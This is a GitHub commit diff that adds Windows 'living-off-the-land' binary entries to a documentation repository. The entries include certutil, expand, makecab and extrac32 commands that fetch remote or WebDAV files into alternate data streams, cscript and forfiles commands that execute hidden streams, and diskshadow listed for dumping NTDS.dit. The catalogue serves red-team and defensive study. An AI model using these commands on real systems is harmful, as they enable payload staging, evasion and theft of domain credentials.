Skip to content

Commit 0f6776d

Browse files
committed
Added some more LOLBins
1 parent 610e5d7 commit 0f6776d

27 files changed

+658
-10
lines changed

Contribute.md

+1
Original file line numberDiff line numberDiff line change
@@ -20,6 +20,7 @@ Resources:
2020
Full path:
2121
```
2222
c:\windows\system32\binary.exe
23+
c:\windows\sysWOW64\binary.exe
2324
```
2425

2526
Notes:

LOLBins.md

+22-1
Original file line numberDiff line numberDiff line change
@@ -6,26 +6,42 @@ If you are missing from the acknowledgement, please let me know (I did not forge
66
# OS BINARIES
77

88
[Atbroker.exe](OSBinaries/Atbroker.md)
9+
[Bash.exe](OSBinaries/Bash.md)
10+
[Certutil.exe](OSBinaries/Certutil.md)
911
[Cmstp.exe](OSBinaries/Cmstp.md)
1012
[Control.exe](OSBinaries/Control.md)
13+
[Cscript.exe](OSBinaries/Cscript.md)
1114
[Dfsvc.exe](OSBinaries/Dfsvc.md)
15+
[Diskshadow.exe](OSBinaries/Diskshadow.md)
16+
[Extrac32.exe](OSBinaries/Extrac32.md)
17+
[Expand.exe](OSBinaries/Expand.md)
18+
[Findstr.exe](OSBinaries/Findstr.md)
1219
[Forfiles.exe](OSBinaries/Forfiles.md)
20+
[Hh.exe](OSBinaries/Hh.md)
1321
[Ieexec.exe](OSBinaries/Ieexec.md)
1422
[Ie4unit.exe](OSBinaries/Ie4unit.md)
1523
[Infdefaultinstall.exe](OSBinaries/Infdefaultinstall.md)
1624
[Installutil.exe](OSBinaries/Installutil.md)
25+
[Makecab.exe](OSBinaries/Makecab.md)
1726
[Mavinject.exe](OSBinaries/Mavinject.md)
1827
[Msbuild.exe](OSBinaries/Msbuild.md)
1928
[Msdt.exe](OSBinaries/Msdt.md)
2029
[Mshta.exe](OSBinaries/Mshta.md)
2130
[Msiexec.exe](OSBinaries/Msiexec.md)
2231
[Odbcconf.exe](OSBinaries/Odbcconf.md)
32+
[Pcalua.exe](OSBinaries/Pcalua.md)
33+
[Powershell.exe](OSBinaries/Powershell.md)
2334
[Presentationhost.exe](OSBinaries/Presentationhost.md)
35+
[Print.exe](OSBinaries/Print.md)
36+
[Reg.exe](OSBinaries/Reg.md)
37+
[Regedit.exe](OSBinaries/Regedit.md)
2438
[Regasm.exe](OSBinaries/Regasm.md)
2539
[Regsvcs.exe](OSBinaries/Regsvcs.md)
2640
[Regsvr32.exe](OSBinaries/Regsvr32.md)
2741
[Rundll32.exe](OSBinaries/Rundll32.md)
2842
[Runscripthelper.exe](OSBinaries/Runscripthelper.md)
43+
[Sc.exe](OSBinaries/Sc.md)
44+
[Scriptrunner.exe](OSBinaries/Scriptrunner.md)
2945
[Syncappvpublishingserver.exe](OSBinaries/Syncappvpublishingserver.md)
3046
[Wmic.exe](OSBinaries/Wmic.md)
3147
[Xwizard.exe](OSBinaries/Xwizard.md)
@@ -34,18 +50,23 @@ If you are missing from the acknowledgement, please let me know (I did not forge
3450

3551
# OTHER MICROSOFT SIGNED BINARIES
3652

53+
[Appvlp.exe](OtherMSBinaries/Appvlp.md)
3754
[Bginfo.exe](OtherMSBinaries/Bginfo.md)
3855
[Cdb.exe](OtherMSBinaries/Cdb.md)
3956
[Csi.exe](OtherMSBinaries/Csi.md)
4057
[Dnx.exe](OtherMSBinaries/Dnx.md)
4158
[Msxsl.exe](OtherMSBinaries/Msxsl.md)
4259
[Rcsi.exe](OtherMSBinaries/Rcsi.md)
60+
[Sqldumper.exe](OtherMSBinaries/Sqldumper.md)
61+
[Sqlps.exe](OtherMSBinaries/Sqlps.md)
4362
[Te.exe](OtherMSBinaries/Te.md)
4463
[Tracker.exe](OtherMSBinaries/Tracker.md)
4564
[Winword.exe](OtherMSBinaries/Winword.md)
4665

4766

48-
67+
# OTHER NON MICROSOFT BINARIES
68+
[Nvuhda6.exe](OtherBinaries/Nvuhda6.md)
69+
4970

5071

5172

OSBinaries/Bash.md

+27
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,27 @@
1+
## Bash.exe
2+
3+
* Functions: Execute
4+
5+
```
6+
bash.exe -c calc.exe
7+
```
8+
9+
Acknowledgements:
10+
* ?
11+
12+
Code sample:
13+
*
14+
15+
Resources:
16+
*
17+
18+
Full path:
19+
```
20+
?
21+
```
22+
23+
Notes:
24+
25+
26+
27+

OSBinaries/Certutil.md

+36
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,36 @@
1+
## Certutil.exe
2+
3+
* Functions: Download, Add ADS, Decode, Encode
4+
5+
```
6+
certutil.exe -urlcache -split -f http://7-zip.org/a/7z1604-x64.exe 7zip.exe
7+
8+
certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt
9+
10+
certutil -encode inputFileName encodedOutputFileName
11+
12+
certutil -decode encodedInputFileName decodedOutputFileName
13+
```
14+
15+
Acknowledgements:
16+
* Matt Graeber - @mattifestation
17+
* Moriarty - @Moriarty2016
18+
19+
Code sample:
20+
*
21+
22+
Resources:
23+
* https://twitter.com/Moriarty_Meng/status/984380793383370752
24+
* https://twitter.com/mattifestation/status/620107926288515072
25+
26+
Full path:
27+
```
28+
c:\windows\system32\certutil.exe
29+
c:\windows\sysWOW64\certutil.exe
30+
```
31+
32+
Notes:
33+
34+
35+
36+

OSBinaries/Cscript.md

+29
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,29 @@
1+
## Cscript.exe
2+
3+
* Functions: Execute, Read ADS
4+
5+
```
6+
cscript c:\ads\file.txt:script.vbs
7+
```
8+
9+
Acknowledgements:
10+
* Oddvar Moe - @oddvarmoe
11+
12+
Code sample:
13+
*
14+
15+
Resources:
16+
* https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
17+
* https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/
18+
19+
Full path:
20+
```
21+
c:\windows\system32\cscript.exe
22+
c:\windows\sysWOW64\cscript.exe
23+
```
24+
25+
Notes:
26+
27+
28+
29+

OSBinaries/Diskshadow.md

+30
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,30 @@
1+
## Diskshadow.exe
2+
3+
* Functions: Execute, Dump NTDS.dit
4+
5+
```
6+
diskshadow.exe /s c:\test\diskshadow.txt
7+
8+
diskshadow> exec calc.exe
9+
```
10+
11+
Acknowledgements:
12+
* Jimmy - @bohops
13+
14+
Code sample:
15+
*
16+
17+
Resources:
18+
* https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/
19+
20+
Full path:
21+
```
22+
c:\windows\system32\diskshadow.exe
23+
c:\windows\sysWOW64\diskshadow.exe
24+
```
25+
26+
Notes:
27+
Only present on Windows Server OS 2008 and newer
28+
29+
30+

OSBinaries/Expand.md

+34
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,34 @@
1+
## Expand.exe
2+
3+
* Functions: Download, Copy, Add ADS
4+
5+
```
6+
expand \\webdav\folder\file.bat c:\ADS\file.bat
7+
8+
expand c:\ADS\file1.bat c:\ADS\file2.bat
9+
10+
expand \\webdav\folder\file.bat c:\ADS\file.txt:file.bat
11+
```
12+
13+
Acknowledgements:
14+
* Rahmat Nurfauzi - @infosecn1nja
15+
* Oddvar Moe - @oddvarmoe
16+
17+
Code sample:
18+
* [NameOfLink](Payload/NameOfPayload)
19+
20+
Resources:
21+
* https://twitter.com/infosecn1nja/status/986628482858807297
22+
* https://twitter.com/Oddvarmoe/status/986709068759949319
23+
24+
Full path:
25+
```
26+
c:\windows\system32\Expand.exe
27+
c:\windows\sysWOW64\Expand.exe
28+
```
29+
30+
Notes:
31+
32+
33+
34+

OSBinaries/Extrac32.md

+31
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,31 @@
1+
## Extrac32.exe
2+
3+
* Functions: Add ADS
4+
5+
```
6+
extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe
7+
8+
extrac32 \\webdavserver\webdav\file.cab c:\ADS\file.txt:file.exe
9+
```
10+
11+
Acknowledgements:
12+
* Oddvar Moe - @oddvarmoe
13+
14+
Code sample:
15+
*
16+
17+
Resources:
18+
* https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/
19+
* https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
20+
21+
Full path:
22+
```
23+
c:\windows\system32\extrac32.exe
24+
c:\windows\sysWOW64\extrac32.exe
25+
```
26+
27+
Notes:
28+
29+
30+
31+

OSBinaries/Findstr.md

+31
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,31 @@
1+
## Findstr.exe
2+
3+
* Functions: Add ADS
4+
5+
```
6+
findstr /V /L W3AllLov3DonaldTrump c:\ADS\file.exe > c:\ADS\file.txt:file.exe
7+
8+
findstr /V /L W3AllLov3DonaldTrump \\webdavserver\folder\file.exe > c:\ADS\file.txt:file.exe
9+
```
10+
11+
Acknowledgements:
12+
* Oddvar Moe - @oddvarmoe
13+
14+
Code sample:
15+
*
16+
17+
Resources:
18+
* https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/
19+
* https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
20+
21+
Full path:
22+
```
23+
c:\windows\system32\findstr.exe
24+
c:\windows\sysWOW64\findstr.exe
25+
```
26+
27+
Notes:
28+
Some specific details about the binary file.
29+
30+
31+

OSBinaries/Forfiles.md

+2-1
Original file line numberDiff line numberDiff line change
@@ -3,7 +3,8 @@
33
* Functions: Execute, Read ADS
44

55
```
6-
forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe
6+
forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe
7+
78
forfiles /p c:\windows\system32 /m notepad.exe /c "c:\folder\normal.dll:evil.exe"
89
```
910

OSBinaries/Hh.md

+30
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,30 @@
1+
## hh.exe
2+
3+
* Functions: Open Explorer
4+
5+
```
6+
HH.exe http://www.google.com
7+
8+
HH.exe C:\
9+
```
10+
11+
Acknowledgements:
12+
* Oddvar Moe - @oddvarmoe
13+
14+
Code sample:
15+
*
16+
17+
Resources:
18+
* https://oddvar.moe/2017/08/13/bypassing-device-guard-umci-using-chm-cve-2017-8625/
19+
20+
Full path:
21+
```
22+
c:\windows\system32\hh.exe
23+
c:\windows\sysWOW64\hh.exe
24+
```
25+
26+
Notes:
27+
28+
29+
30+

OSBinaries/Makecab.md

+32
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,32 @@
1+
## Makecab.exe
2+
3+
* Functions: Package, Add ADS, Download
4+
5+
```
6+
makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns.cab
7+
8+
makecab \\webdavserver\webdav\file.exe C:\Folder\file.cab
9+
10+
makecab \\webdavserver\webdav\file.exe C:\Folder\file.txt:file.cab
11+
```
12+
13+
Acknowledgements:
14+
* Oddvar Moe - @oddvarmoe
15+
16+
Code sample:
17+
*
18+
19+
Resources:
20+
* https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
21+
22+
Full path:
23+
```
24+
c:\windows\system32\makecab.exe
25+
c:\windows\sysWOW64\makecab.exe
26+
```
27+
28+
Notes:
29+
30+
31+
32+

0 commit comments

Comments
 (0)